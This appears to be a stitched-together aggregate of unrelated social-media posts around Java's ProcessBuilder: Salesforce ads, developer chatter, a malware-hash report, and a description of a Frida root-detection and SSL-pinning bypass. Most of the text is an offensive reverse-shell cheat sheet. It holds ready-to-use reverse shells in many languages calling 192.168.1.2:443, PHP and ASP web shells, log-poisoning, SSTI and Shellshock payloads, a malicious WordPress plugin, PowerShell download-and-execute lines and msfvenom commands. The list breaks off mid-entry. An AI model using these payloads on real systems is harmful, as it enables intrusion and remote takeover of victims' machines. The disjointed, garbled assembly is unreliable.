Both hashes now show THOR YARA match EXPL_SUSP_JS_POC_Dec25 on VT, tied to CVE-2025-55182 (React Server RCE PoC indicators, disclosed Dec ’25) • File 7: c026d2ae1d2439cc7200d0085b955cb0b8a53a80bf9c9585daac129041c4e716 🔗 virustotal.com/gui/file/c026… • File 8: 8a333b62d5c4580137ccd33ebbecb65b6fae4c45c78007c3becdef6beb95e067 🔗 virustotal.com/gui/file/8a33… Observed: Blobs in IndexedDB post-Seller login (reproduced multi-browser/machine). Older YARA hits also present (Bash combo, Java ProcessBuilder, Linux indicators, etc.) VT comments attached.

class check-sitonmyface{ public static void main(String[] args) throws Exception { var check=new ProcessBuilder("def fine_girl_reactivate()").start(); if(check.waitFor()==0) System.out.println("sitonmyface"); } }

class check_perfect_match{ public static void main(String[] args) throws Exception { var check=new ProcessBuilder("def fine_girl_reactivate()").start(); if(check.waitFor()==0) System.out.println("perfect match"); } }

🚨 Still using Workflow Rules or Process Builder in Salesforce? Don’t wait for things to break. Future-proof your Salesforce setup now. 👉 xccelerance.com/still-using-… #Salesforce #SalesforceFlow #WorkflowRules #ProcessBuilder #SalesforceMigration #CRM #DigitalTransformation

前にStreamでProcessBuilder量産してJVM起動しまくったときがあってそのときはPCのファンが喘ぎ始めてアホほど処理が遅くなったんだけど、スレッド数そこそこに抑えても500msくらい遅延するんだよな そういうもんなのかな

Workflow vs. Process Builder ⚡Workflow Rules vs. Process Builder – Which one to use?⚡ ✔️Workflow Rules – Best for simple automations (email alerts, field updates) ✔️Process Builder – More advanced logic with multiple actions #SalesforceAutomation #WorkflowRules #ProcessBuilder

This Frida script bypasses root detection, SSL pinning, and emulator detection in Android apps. It disables SSL certificate validation using multiple techniques, including custom X509TrustManager, OkHttp CertificatePinner bypass, TrustKit pinning, and WebViewClient SSL handling. For root detection bypass, it hooks system calls (fopen, access), modifies system properties, intercepts shell commands, alters Runtime.exec, filters ProcessBuilder, and prevents detection of root-related files and packages. It blocks checks for 35 root files and 25 root-related packages. The emulator detection bypass spoofs Build properties, telephony info, and hardware details, preventing detection through system and CPU checks. Further improvements will enhance CPU and telephony-based detection bypass. The script caches results for performance, making it a powerful tool for security research.

Hey everyone, I have updated the code: 1. SSL/Certificate Pinning Bypass Bypasses SSL certificate validation and pinning through multiple methods:Custom X509TrustManager implementation OkHttp CertificatePinner bypass TrustKit pinning bypass WebViewClient SSL error handler Certificate pinning exception handling 2. Root Detection Bypass: Comprehensive root detection bypass through: Native file operation hooks (fopen, access) System property checks Shell command interception Runtime.exec modifications File existence checks ProcessBuilder command filtering Build property modifications Package manager checks BufferedReader modifications Secure hardware attestation 3. Emulator Detection Bypass: Bypasses common emulator detection methods: Build property modifications Telephony information spoofing Emulator-specific file checks CPU information modification System property checks Package detection prevention

🚀 Java Tip 🚀 Java's Process API provides better control over operating system processes. ProcessBuilder pb = new ProcessBuilder("app.exe"); Process process = pb.start(); docs.oracle.com/en/java/java… #Java

結局当方もProcessBuilderが速いという結果にw

Hey Salesforce career-building enthusiasts #salesforce #salesforcecourse #salesforcetraining #automation #datavisualization #teksacademy #bestsalesforcetraininginsituteinhyderabad #salesforcetraining #salesforcetools #dashboards #processbuilder #visualworkflow #schemabuilder

Unfortunately :( The server blocked our attempts of directly invoking a system command or even if `.execute()` was detected. Even ProcessBuilder was blocked. Now, we needed a workaround or No P1/Exceptional. Fortunately, with the help of internet lords and chatGPT...

Collection of Offensive Reverse Shell Guides. ⅌ ███████████████████ Bash Reverse Shells TCP Reverse Shell bash sh -i >& /dev/tcp/192.168.1.2/443 0>&1 /bin/sh -i >& /dev/tcp/192.168.1.2/443 0>&1 bash -i >& /dev/tcp/192.168.1.2/443 0>&1 /bin/bash -i >& /dev/tcp/192.168.1.2/443 0>&1 Alternative Methods Using File Descriptors bash 0<&196;exec 196<>/dev/tcp/192.168.1.2/443; sh <&196 >&196 2>&196 0<&196;exec 196<>/dev/tcp/192.168.1.2/443; /bin/sh <&196 >&196 2>&196 0<&196;exec 196<>/dev/tcp/192.168.1.2/443; bash <&196 >&196 2>&196 0<&196;exec 196<>/dev/tcp/192.168.1.2/443; /bin/bash <&196 >&196 2>&196 Using read and exec bash exec 5<>/dev/tcp/192.168.1.2/443; cat <&5 | while read line; do $line 2>&5 >&5; done sh -i 5<> /dev/tcp/192.168.1.2/443 0<&5 1>&5 2>&5 /bin/sh -i 5<> /dev/tcp/192.168.1.2/443 0<&5 1>&5 2>&5 bash -i 5<> /dev/tcp/192.168.1.2/443 0<&5 1>&5 2>&5 /bin/bash -i 5<> /dev/tcp/192.168.1.2/443 0<&5 1>&5 2>&5 Using -c bash bash -c 'bash -i >& /dev/tcp/192.168.1.2/443 0>&1' Basic URL encode bash -c 'bash -i >& /dev/tcp/192.168.1.2/443 0>&1' Full URL encode bash -c 'bash -i >& /dev/tcp/192.168.1.2/443 0>&1' UDP Reverse Shell bash sh -i >& /dev/udp/192.168.1.2/443 0>&1 /bin/sh -i >& /dev/udp/192.168.1.2/443 0>&1 bash -i >& /dev/udp/192.168.1.2/443 0>&1 /bin/bash -i >& /dev/udp/192.168.1.2/443 0>&1 Netcat Reverse Shells Netcat Linux Using -e bash nc 192.168.1.2 443 -e sh nc 192.168.1.2 443 -e /bin/sh nc 192.168.1.2 443 -e bash nc 192.168.1.2 443 -e /bin/bash Using -c bash nc -c sh 192.168.1.2 443 nc -c /bin/sh 192.168.1.2 443 nc -c bash 192.168.1.2 443 nc -c /bin/bash 192.168.1.2 443 Without -e or -c bash mknod /tmp/backpipe p /bin/sh 0</tmp/backpipe | nc 192.168.1.2 443 1>/tmp/backpipe Using FIFO bash rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | sh -i 2>&1 | nc 192.168.1.2 443 >/tmp/f rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.1.2 443 >/tmp/f rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | bash -i 2>&1 | nc 192.168.1.2 443 >/tmp/f rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc 192.168.1.2 443 >/tmp/f URL encode rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.2 443 >/tmp/f Base64 **Attacker:** bash base64 -w 0 <<< 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.2 443 >/tmp/f' **Output:** plaintext cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnwvYmluL3NoIC1pIDI JjF8bmMgMTkyLjE2OC4xLjIgNDQzID4vdG1wL2YK **Victim:** bash echo 'cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnwvYmluL3NoIC1pIDI JjF8bmMgMTkyLjE2OC4xLjIgNDQzID4vdG1wL2YK' | base64 -d | sh **Or using a URL:** plaintext http://192.168.1.3/cmd.php?cmd=echo 'cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnwvYmluL3NoIC1pIDI JjF8bmMgMTkyLjE2OC4xLjIgNDQzID4vdG1wL2YK' | base64 -d | sh Netcat Windows bash nc.exe -e cmd 192.168.1.2 443 **SMB server:** bash cp $(locate nc.exe) . && impacket-smbserver a $(pwd) -smb2support \\192.168.1.2\a\nc.exe -e cmd 192.168.1.2 443 BusyBox Reverse Shell bash busybox nc 192.168.1.2 443 -e sh busybox nc 192.168.1.2 443 -e /bin/sh busybox nc 192.168.1.2 443 -e bash busybox nc 192.168.1.2 443 -e /bin/bash No space busybox${IFS}nc${IFS}192.168.1.2${IFS}443${IFS}-e${IFS}sh cURL Reverse Shell **Attacker:** bash echo "nc -e /bin/sh 192.168.1.2 443" > index.html && python3 -m http.server 80 nc -lvnp 443 **Victim:** plaintext http://192.168.1.3/cmd.php?cmd=curl 192.168.1.2/index.html|sh Wget Reverse Shell **Attacker:** bash echo "nc -e /bin/sh 192.168.1.2 443" > index.html && python3 -m http.server 80 nc -lvnp 443 **Victim:** plaintext http://192.168.1.3/cmd.php?cmd=wget -qO- 192.168.1.2/index.html|sh Node-RED Reverse Shell json [{"id":"7235b2e6.4cdb9c","type":"tab","label":"Flow 1"},{"id":"d03f1ac0.886c28","type":"tcp out","z":"7235b2e6.4cdb9c","host":"","port":"","beserver":"reply","base 64":false,"end":false,"name":"","x":786,"y":350,"wires":[]},{"id":"c14a4b00.271d28","type":"tcp in","z":"7235b2e6.4cdb9c","name":"","server":"client","host":"192.168.1.2","port":"443","datamode":"stream","datatype":"buffer","newline":"","topic":"","base64":false,"x":281,"y":337,"wires":[["4750d7cd.3c6e88"]]},{"id":"4750d7cd.3c6e88","type":"exec","z":"7235b2e6.4cdb9c","command":"","addpay":true,"append":"","useSpawn":"false","timer":"","oldrc":false,"name":"","x":517,"y":362.5,"wires":[["d03f1ac0.886c28"],["d03f1ac0.886c28"],["d03f1ac0.886c28"]]}] WebShells Exif Data WebShell bash exiftool -Comment='<?php system($_GET['cmd']); ?>' filename.png mv filename.png filename.php.png ASP WebShell asp <%response.write CreateObject("WScript{.}Shell").Exec(Request.QueryString("cmd")).StdOut.Readall()%> PHP WebShell Chain Filter php php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16|convert.iconv.WINDOWS-1258.UTF32LE|convert.iconv.ISIRI3342.ISO-IR-157|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.BIG5.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.iconv.ISO-IR-103.850|convert.iconv.PT154.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.SJIS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.DEC.UTF-16|convert.iconv.ISO8859-9.ISO_6937-2|convert.iconv.UTF16.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.CSA_T500-1983.UCS-2BE|convert.iconv.MIK.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.863.UNICODE|convert.iconv.ISIRI3342.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.iconv.ISO-IR-103.850|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert{.}iconv{.}PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert{.}iconv{.}PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.863.UTF-16|convert.iconv.ISO6937.UTF16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.864.UTF32|convert.iconv.IBM912.NAPLPS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.ISO6937.8859_4|convert.iconv.IBM868.UTF-16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L4.UTF32|convert.iconv.CP1250.UCS-2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF16|convert.iconv.ISO6937.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert .iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp&cmd=id GET php <?=$_GET[cmd]?> <?php system($_GET['cmd']); ?> <?php passthru($_GET['cmd']); ?> <?php echo exec($_GET['cmd']); ?> <?php system($_REQUEST['cmd']); ?> <?php echo shell_exec($_GET['cmd']); ?> <pre><?php system($_GET['cmd']); ?></pre> <pre><h1><?php system($_GET['cmd']); ?></h1></pre> <?php echo "<pre>" . shell_exec($_REQUEST['cmd']) . "</pre>"; ?> POST php <?php system($_POST['cmd']); ?> Log Poisoning WebShell Log Poisoning SSH plaintext > /var/log/auth.log ssh '<?php system($_GET["cmd"]); ?>'@192.168.1.2 plaintext > /var/log/auth.log&cmd=id Log Poisoning FTP plaintext > /var/log/vsftpd.log root@kali:~ ftp 192.168.1.3 Connected to 192.168.1.3. 220 (vsFTPd 3.0.3) Name (192.168.1.2:kali): <?php system($_GET['cmd']); ?> 331 Please specify the password. Password: <?php system($_GET['cmd']); ?> 530 Login incorrect. Login failed. ftp> plaintext > /var/log/vsftpd.log&cmd=id Log Poisoning HTTP plaintext > /var/log/apache2/access.log > /var/log/nginx/access.log curl -s -H "User-Agent: <?php system(\$_GET['cmd']); ?>" "http://192.168.1.2" plaintext User-Agent: <?php system($_GET['cmd']); ?> plaintext > /var/log/apache2/access.log&cmd=id > /var/log/nginx/access.log&cmd=id Server Side Template Injection python {{request.application.__globals__.__builtins__.__import__('os').popen('nc -e /bin/sh 192.168.1.2 443').read()}} python {{''.__class__.__mro__[1].__subclasses__()[373]("bash -c 'bash -i >& /dev/tcp/192.168.1.2/443 0>&1'",shell=True,stdout=-1).communicate()[0].strip()}} python {% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket{.}AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.1.2\",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess{.}call([\"/bin/bash\", \"-i\"]);'").read().zfill(417)}}{%endif%}{% endfor %} python {% import os %}{{os.system('bash -c "bash -i >& /dev/tcp/192.168.1.2/443 0>&1"')}} python {% import os %}{{os.system('bash -c "bash -i >& /dev/tcp/192.168.1.2/443 0>&1"')}} UnrealIRCd bash echo "AB; nc -e /bin/sh 192.168.1.2 443" | nc 192.168.1.3 6697 Exif Data Reverse Shell bash exiftool -Comment='<?php system("nc -e /bin/bash 192.168.1.2 443"); ?>' filename.png mv filename.png filename.php.png Shellshock Shellshock SSH bash ssh user@192.168.1.3 '() { :;}; nc 192.168.1.2 443 -e /bin/bash' ssh user@192.168.1.3 -i id_rsa '() { :;}; nc 192.168.1.2 443 -e /bin/bash' Shellshock HTTP bash curl -H 'Cookie: () { :;}; /bin/bash -i >& /dev/tcp/192.168.1.2/443 0>&1' http://192.168.1.3/cgi-bin/test.sh curl -H "User-Agent: () { :; }; /bin/bash -c 'bash -i >& /dev/tcp/192.168.1.2/443 0>&1'" "http://192.168.1.3/cgi-bin/evil.sh" curl -H "User-Agent: () { :; }; /bin/bash -c 'bash -i >& /dev/tcp/192.168.1.2/443 0>&1'" "http://192.168.1.3/cgi-bin/evil.cgi" bash curl -H "User-Agent: () { :; }; echo; /bin/bash -c 'bash -i >& /dev/tcp/192.168.1.2/443 0>&1'" "http://192.168.1.3/cgi-bin/evil.sh" curl -H "User-Agent: () { :; }; echo; echo; /bin/bash -c 'bash -i >& /dev/tcp/192.168.1.2/443 0>&1'" "http://192.168.1.3/cgi-bin/evil.sh" curl -H "User-Agent: () { :; }; echo; /bin/bash -c 'bash -i >& /dev/tcp/192.168.1.2/443 0>&1'" "http://192.168.1.3/cgi-bin/evil.cgi" curl -H "User-Agent: () { :; }; echo; echo; /bin/bash -c 'bash -i >& /dev/tcp/192.168.1.2/443 0>&1'" "http://192.168.1.3/cgi-bin/evil.cgi" CMS Reverse Shells WordPress Plugin Reverse Shell Create Plugin (Reverse Shell) bash touch plugin.php nano plugin.php Plugin Content php <?php /** * Plugin Name: Shelly * Plugin URI: http://localhost * Description: Love Shelly * Version: 1.0 * Author: d4t4s3c * Author URI: https://github{.}com/d4t4s3c */ exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.2/443 0>&1'"); ?> Compress Plugin bash zip plugin{.}zip plugin.php Installation Steps - Plugins - Add New - Upload Plugin - Install Now - Activate Plugin October CMS php function onstart(){ exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.2/443 0>&1'"); } Jenkins Reverse Shells Jenkins Windows **Netcat (Method 1):** bash cmd = "\\\\192.168.1.2\\a\\nc.exe -e cmd 192.168.1.2 443" cmd.execute().text **Netcat (Method 2):** bash println "\\\\192.168.1.2\\a\\nc.exe -e cmd 192.168.1.2 443".execute().text **CMD:** java String host="192.168.1.2"; int port=443; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start(); Socket s=new Socket(host,port); InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream(); OutputStream po=p.getOutputStream(),so=s.getOutputStream(); while(!s.isClosed()){ while(pi.available()>0)so.write(pi{.}read()); while(pe.available()>0)so.write(pe{.}read()); while(si.available()>0)po.write(si{.}read()); so.flush();po.flush(); Thread.sleep(50); try {p.exitValue();break;}catch (Exception e){} } p.destroy();s.close(); **PowerShell:** powershell command = "powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.2:8000/reverse.ps1')" println(command.execute().text) Jenkins Linux **Netcat (Method 1):** bash cmd = "nc -e /bin/sh 192.168.1.10 443" cmd.execute().text **Netcat (Method 2):** bash "nc -e /bin/sh 192.168.1.2 443".execute().text **Bash:** java String host="192.168.1.2"; int port=443; String cmd="bash"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start(); Socket s=new Socket(host,port); InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream(); OutputStream po=p.getOutputStream(),so=s.getOutputStream(); while(!s.isClosed()){ while(pi.available()>0)so.write(pi{.}read()); while(pe.available()>0)so.write(pe{.}read()); while(si.available()>0)po.write(si{.}read()); so.flush();po.flush(); Thread.sleep(50); try {p.exitValue();break;}catch (Exception e){} } p.destroy();s.close(); Perl Reverse Shell perl perl -e 'use Socket;$i="192.168.1.2";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp")); if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S"); exec("/bin/sh -i");};' Python Reverse Shell Python 2.x **Sh:** python export RHOST="192.168.1.2";export RPORT=443; python -c 'import sys,socket,os,pty; s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("sh")' **Bash:** python export RHOST="192.168.1.2";export RPORT=443; python -c 'import sys,socket,os,pty; s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")' **Generic:** python python -c 'import socket,subprocess,os; s=socket.socket(socket{.}AF_INET,socket.SOCK_STREAM); s.connect(("192.168.1.2",443)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2); import pty; pty.spawn("bash")' Python 3.x **Sh:** python export RHOST="192.168.1.2";export RPORT=443; python3 -c 'import sys,socket,os,pty; s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("sh")' **Bash:** python export RHOST="192.168.1.2";export RPORT=443; python3 -c 'import sys,socket,os,pty; s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")' **Generic:** python python3 -c 'import socket,subprocess,os; s=socket.socket(socket{.}AF_INET,socket.SOCK_STREAM); s.connect(("192.168.1.2",443)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2); import pty; pty.spawn("/bin/bash")' PHP Reverse Shell php <?php exec("nc -e /bin/sh 192.168.1.2 443"); ?> <?php passthru("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.2 443 >/tmp/f"); ?> php -r '$sock=fsockopen("192.168.1.2",443);/bin/sh -i <&3 >&3 2>&3;' php -r '$sock=fsockopen("192.168.1.2",443);exec("/bin/sh -i <&3 >&3 2>&3");' php -r '$sock=fsockopen("192.168.1.2",443);system("/bin/sh -i <&3 >&3 2>&3");' php -r '$sock=fsockopen("192.168.1.2",443);passthru("/bin/sh -i <&3 >&3 2>&3");' php -r '$sock=fsockopen("192.168.1.2",443);popen("/bin/sh -i <&3 >&3 2>&3", "r");' php -r '$sock=fsockopen("192.168.1.2",443);shell_exec("/bin/sh -i <&3 >&3 2>&3");' php -r '$sock=fsockopen("192.168.1.2",443);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);' Ruby Reverse Shell ruby ruby -rsocket -e'f=TCPSocket{.}open("192.168.1.2",443).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' ruby -rsocket -e 'exit if fork;c=TCPSocket{.}new("192.168.1.2","443");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io{.}read}end' ruby -rsocket -e 'c=TCPSocket{.}new("192.168.1.2","443");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io{.}read}end' Xterm Reverse Shell bash xterm -display 192.168.1.2:443 Ncat Reverse Shell TCP bash ncat 192.168.1.2 443 -e /bin/sh ncat 192.168.1.2 443 -e /bin/bash UDP bash rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|ncat -u 192.168.1.2 443 >/tmp/f Socat Reverse Shell bash socat TCP:192.168.1.2:443 EXEC:sh socat TCP:192.168.1.2:443 EXEC:'bash -li',pty,stderr,setsid,sigint,sane PowerShell Reverse Shell powershell powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System{.}Net.Sockets.TCPClient("192.168.1.2",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream{.}Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback "PS " (pwd).Path "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() powershell powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.2',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback 'PS ' (pwd).Path '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" powershell powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.2:8000/reverse.ps1') powershell C:\Windows\SysNative\WindowsPowerShell\v1.0\powershell.exe IEX(New-Object Net.WebClient).DownloadString('http://192.168.1.2/shell.ps1') powershell powershell -c "IEX(New-Object System{.}Net.WebClient).DownloadString('http://192.168.1.2/powercat.ps1');powercat -c 192.168.1.2 -p 443 -e cmd" Awk Reverse Shell bash awk 'BEGIN {s = "/inet/tcp/0/192.168.1.2/443"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null Gawk Reverse Shell bash gawk 'BEGIN {P=443;S="> ";H="192.168.1.2";V="/inet/tcp/0/"H"/"P;while(1){do{printf S|&V;V|&getline c;if(c){while((c|&getline)>0)print $0|&V;close(c)}}while(c!="exit")close(V)}}' Golang Reverse Shell bash echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","192.168.1.2:443");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c cmd{.}Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go Telnet Reverse Shell bash rm -f /tmp/p; mknod /tmp/p p && telnet 192.168.1.2 443 0/tmp/p telnet 192.168.1.2 80 | /bin/bash | telnet 192.168.1.2 443 mknod a p && telnet 192.168.1.2 443 0<a | /bin/sh 1>a TF=$(mktemp -u);mkfifo && telnet 192.168.1.2 443 0<$TF | sh 1>$TF Java Reverse Shell java r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/192.168.1.2/443;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor() Node.js Reverse Shell js require('child_process').exec('bash -i >& /dev/tcp/192.168.1.2/443 0>&1'); Msfvenom Reverse Shells Web Payloads PHP Payload bash msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.2 LPORT=443 -f raw > reverse.php msfvenom -p php/reverse_php LHOST=192.168.1.2 LPORT=443 -f raw > reverse.php WAR Payload bash msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.2 LPORT=443 -f war > reverse.war JAR Payload bash msfvenom -p java/shell_reverse_tcp LHOST=192.168.1.2 LPORT=443 -f jar > reverse.jar JSP Payload bash msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.2 LPORT=443 -f raw > reverse.jsp ASPX Payload bash msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.2 LPORT=443 -f aspx -o reverse.aspx msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.2 LPORT=443 -f aspx -o reverse.aspx msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.1.2 LPORT=443 -f aspx -o reverse.aspx Linux Payloads Listener Netcat **x86 - Shell:** bash msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.1.2 LPORT=443 -f elf > reverse.elf **x64 - Shell:** 